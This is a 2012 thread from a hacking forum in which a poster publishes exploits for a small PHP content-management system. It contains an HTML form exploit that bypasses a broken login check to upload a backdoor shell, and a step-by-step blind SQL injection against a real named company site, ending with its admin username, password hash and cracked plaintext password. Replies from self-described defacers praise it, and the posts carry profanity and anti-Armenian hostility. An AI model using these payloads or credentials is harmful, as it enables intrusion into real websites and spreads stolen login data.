Anti-armenia.ORG - Forumlar - xacik cms X auth bypass+ shell upload+Blind SQli

Forumlar / Hacking Platform / Exploits & Vulnerabilities / xacik cms X auth bypass+ shell upload+Blind SQli

Istifadəçi

2012-11-16 23:49 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Dedim bu mövzunu açım hansısa xaçik web bitch studiyasının məhsuludur bu cms amma tapa bilmədim hansı web bitch studiyası yazıb bunu.
İşdir dedim bəlkə kiminsə lazımı olar + mırta submit də elədim packetstorm-a)
Vulnlar çoxdur burada Əsas 2-sini vermişəm:
1 ) Auth Bypass + Remote shell upload (Exploit)
2 ) Blind SQli.
3 ) CMS-in özünü də.

Y**balnı stanok kimi məşq eləməyə də dəyər bu cms-dən localhostda xD)))))
Enjoy)

http://pastebin.com/uirZSMRX

Kod:

I can't find any information in this cms to refer it's webmaster studio and
the reason to submit this cms+it's vulnerabilities is that: It has a bit funny vulnerabilities)
CMS: http://www.boxca.com/ql6b1sq3nb79/cms_unknown.rar.html

Here we go:

================VULNERABLE CODE===============
//admin/en/save_home.php

<?php
session_start();
if(!isset($_SESSION['username']))
{
header('Location: ../index.php');
}
?>
<?php
include('../../config.php');
mysql_connect($hostname, $username, $password) or DIE('Connection to host is failed, perhaps the service is down!');
mysql_select_db($dbname) or DIE('Database name is not available!');

$home = mysql_query('SELECT title_en, en, image FROM home_text');
$home = mysql_fetch_array($home);

$homeServices = mysql_query('SELECT id, en FROM homeservices ORDER BY id asc');
$homenews = mysql_query('SELECT id,date_en,content_en FROM homenews');
?>

<?php
$err = "?";
$uploaddir = '../../images/';
$img =$home['image'];
if($_FILES['file']['name'] != ''){

if(file_exists($uploaddir . $_FILES['file']['name'])){

$err .="&imgexist=". $_FILES['file']['name'];
header('Location: admin_index.php' . $err);
}
move_uploaded_file($_FILES['file']['tmp_name'], $uploaddir . $_FILES['file']['name']);
$image = '../images/' . $_FILES['file']['name'];
mysql_query('UPDATE home_text SET image="' . $image . '"');
echo mysql_error();
if($img != ''){
unlink('../' . $img);
}

}
if(stripslashes($_POST['title']) != $home['title_en'])
{
$str= mysql_real_escape_string(stripslashes($_POST['title']));
mysql_query('UPDATE home_text SET title_en="' . $str . '"');

}
if(stripslashes($_POST['about']) != $home['en'])
{
$str= mysql_real_escape_string(stripslashes($_POST['about']));
mysql_query('UPDATE home_text SET en=\'' . $str . '\'');
}

for($i = 0; $i < count($_POST['serv_arr']) ; $i++)
{
$data = mysql_fetch_array($homeServices);

if($_POST['serv_arr'][$i] != ""){
if(stripslashes($_POST['serv_arr'][$i]) != $data['en']){
$str = mysql_real_escape_string(stripslashes($_POST['serv_arr'][$i]));
mysql_query('UPDATE homeservices SET en="'.$str. '" WHERE id="' . $data['id'] . '"');
}
}
else{
mysql_query('DELETE FROM homeservices WHERE id=' . $data['id'] );
}
}
if($_POST['new_serv'] !=""){
$str = mysql_real_escape_string(stripslashes($_POST['new_serv']));
mysql_query('INSERT INTO homeservices(en) VALUES("' . $str .'")');
}

for($i = 0; $i < count($_POST['date']) ; $i++)
{
$data = mysql_fetch_array($homenews);
if($_POST['date'][$i] != $data['date_en'] || $_POST['new'][$i] != $data['content_en']){
$str1 = mysql_real_escape_string(stripslashes($_POST['date'][$i]));
$str2 = mysql_real_escape_string(stripslashes($_POST['new'][$i]));
mysql_query('UPDATE homenews SET date_en="' . $str1 . '" WHERE id=' .$data['id'] );
mysql_query('UPDATE homenews SET content_en="' . $str2 .'" WHERE id=' .$data['id']);
}
}

header('Location: admin_index.php?page=home');
?>

============END OF VULNERABLE CODE=============

Notice Flaw in session checking thing)

Here is our:
====AUTH BYPASS + REMOTE SHELL UPLOAD EXPLOIT===

<!DOCTYPE HTML>
<head>
<title></title>
</head>
<body>
<center>
<form method="post" action="http://TARGET_SITE/admin/en/save_home.php" enctype="multipart/form-data">
<input type="hidden" name="title" value="SIKDIR!">
<br>
<br>
<label>Selet your backdoor:(1)</label>
<input type="file" name="file" accept="image/*">==>(2)
<input type="hidden" name="about" readonly="true" value="Sikdir!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="new_serv" placeholder="SIKDIR!">
<input type="hidden" name="date[]" value="sikdir!">
<input type="hidden" name="new[]" value="AUTH BYPASS + SHELL UPLOAD EXPLOIT BY AKASTEP">
<input type="hidden" name="date[]" value="SIKDIR!">
<input type="hidden" name="new[]" value="sikdir!">
<input type="submit" value="PwN IT ASAP))">

</form>
</center>
</body>
</html>

==============END OF EXPLOIT================

BLind SQLi Vulnerability:

==============Vulnerable Code==================
//ru/services.php

<?php
$id = mysql_query('SELECT max(id) as max, min(id) as min FROM services');
$id = mysql_fetch_array($id);
if(isset($_GET['id']) && $_GET['id'] >=$id['min'] && $_GET['id'] <= $id['max'])
{
$text = mysql_query('SELECT image,service_name_ru,service_full_text_ru FROM services where id=' . $_GET["id"]);
$text = mysql_fetch_array($text);
echo '<div class="serv_image">
<img style="margin-top: 80px;" src="' . $text["image"] . '" width="345" height="210" alt="FINTAX" />
<div class="shad_left"></div>
<div class="shad_right"></div>
</div>
<div class="serv_text">
<p class="service_title">' . $text["service_name_ru"] . '</p>
<p class="service_description">' . $text["service_full_text_ru"] . '</p>
</div>
<div class="clear"></div>';
}

==============END OF Vulnerable Code============

http://www.fintax.am/ru/index.php?page=services&id=1 order by 3--

1,2,3

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,2,3 LIMIT 1 offset 1*/--

5.1.62-cll

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(column_name) from information_schema.columns limit 1)),3 limit 1 offset 1*/--

mysql> select 0x7573657273 \g
--------------
| 0x7573657273 |
--------------
| users |
--------------
1 row in set (0.00 sec)

mysql>

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(table_name) from information_schema.tables where table_schema=database() limit 1 offset 11)),3 limit 1 offset 1*/--

COlumnlari:

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(column_name) from information_schema.columns where table_name=0x7573657273 limit 1 offset 0)),3 limit 1 offset 1*/--

id

hex(group_concat(username,0x7c,password)) from users

username

mysql> select 0x757365726E616D65 \g
--------------------
| 0x757365726E616D65 |
--------------------
| username |
--------------------
1 row in set (0.00 sec)

password

mysql> select 0x70617373776F7264 \g
--------------------
| 0x70617373776F7264 |
--------------------
| password |
--------------------
1 row in set (0.00 sec)

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(group_concat(username,0x7c,password)) from users)),3 limit 1 offset 1*/--

mysql> select 0x66696E746178323031327C3636363961386131323331303665366130643364373665386365616261626638 \
-> \g
------------------------------------------------------------------------------------------
| 0x66696E746178323031327C3636363961386131323331303665366130643364373665386365616261626638 |
------------------------------------------------------------------------------------------
| fintax2012|6669a8a123106e6a0d3d76e8ceababf8 |
------------------------------------------------------------------------------------------
1 row in set (0.00 sec)

mysql>

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select convert(group_concat(username,0x7c,password) using latin1) from users)),3 limit 1 offset 1*/--

fintax2012|6669a8a123106e6a0d3d76e8ceababf8

fintax2012
supersecret1010

And Finally i want to say that you can fingerprint this cms using the following technique:
When entering incorrect password for admin it gives

header('Location: index.php?err=asd');

/admin/index.php?err=asd

Notice: asd <= This is a hardcoded value in /admin/loginproc.php

================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-11-17 03:20 GMT

Avatar Fearless

VIP

Mesaj Sayı : 1299

Mövzu Sayı :

Rep Ver :

Rep Sayı : 23

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : Gävle

Ölkə :

Məslək : Hacker,Defacer,Programmer

Yaş : 26

Mesaj :

Respect + Təbriklər
Nə biz bezirik nədə onlar tam gaz iləri!

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png

Anti-armenia.ORG

Istifadəçi

2012-11-17 11:32 GMT

Ferid23

Admin

Mesaj Sayı : 1875

Mövzu Sayı :

Rep Ver :

Rep Sayı : 45

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : Anti-armenia.ORG

Ölkə :

Məslək : Programmer & Defacer

Yaş : 12

Mesaj :

Təbriklər!

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)

Anti-armenia.ORG

Istifadəçi

2012-11-17 12:24 GMT